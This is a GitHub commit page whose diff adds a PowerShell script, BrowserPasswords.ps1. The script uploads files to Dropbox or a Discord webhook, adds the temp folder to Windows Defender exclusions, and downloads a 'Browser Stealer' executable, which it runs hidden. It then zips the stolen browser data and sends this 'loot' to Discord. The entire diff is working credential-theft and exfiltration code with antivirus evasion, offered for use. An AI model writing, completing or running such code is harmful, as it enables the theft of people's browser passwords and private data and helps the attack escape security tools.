Update BrowserPasswords.ps1
This commit is contained in:
I-Am-Jakoby
GitHub
parent
1c6b3d6867
commit
a7489f5730
1 changed files with 62 additions and 0 deletions
|
|
@ -1 +1,63 @@
|
||||||
|
function DropBox-Upload {
|
||||||
|
|
||||||
|
[CmdletBinding()]
|
||||||
|
param (
|
||||||
|
|
||||||
|
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
||||||
|
[Alias("f")]
|
||||||
|
[string]$SourceFilePath
|
||||||
|
)
|
||||||
|
$outputFile = Split-Path $SourceFilePath -leaf
|
||||||
|
$TargetFilePath="/$outputFile"
|
||||||
|
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||||
|
$authorization = "Bearer " + $db
|
||||||
|
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||||
|
$headers.Add("Authorization", $authorization)
|
||||||
|
$headers.Add("Dropbox-API-Arg", $arg)
|
||||||
|
$headers.Add("Content-Type", 'application/octet-stream')
|
||||||
|
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||||
|
}
|
||||||
|
|
||||||
|
if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
|
||||||
|
|
||||||
|
#------------------------------------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
function Upload-Discord {
|
||||||
|
|
||||||
|
[CmdletBinding()]
|
||||||
|
param (
|
||||||
|
[parameter(Position=0,Mandatory=$False)]
|
||||||
|
[string]$file,
|
||||||
|
[parameter(Position=1,Mandatory=$False)]
|
||||||
|
[string]$text
|
||||||
|
)
|
||||||
|
|
||||||
|
$hookurl = "$dc"
|
||||||
|
|
||||||
|
$Body = @{
|
||||||
|
'username' = $env:username
|
||||||
|
'content' = $text
|
||||||
|
}
|
||||||
|
|
||||||
|
if (-not ([string]::IsNullOrEmpty($text))){
|
||||||
|
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
|
||||||
|
|
||||||
|
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download
|
||||||
|
Add-MpPreference -ExclusionPath $env:tmp
|
||||||
|
|
||||||
|
# Download the exe and save it to temp directory
|
||||||
|
iwr "COMING SOON" -outfile "$env:tmp\browser.exe"
|
||||||
|
|
||||||
|
# Execute the Browser Stealer
|
||||||
|
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
|
||||||
|
|
||||||
|
# Exfiltrate the loot to discord
|
||||||
|
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
|
||||||
|
Upload-Discord -file "$env:tmp\browserdata.zip"
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue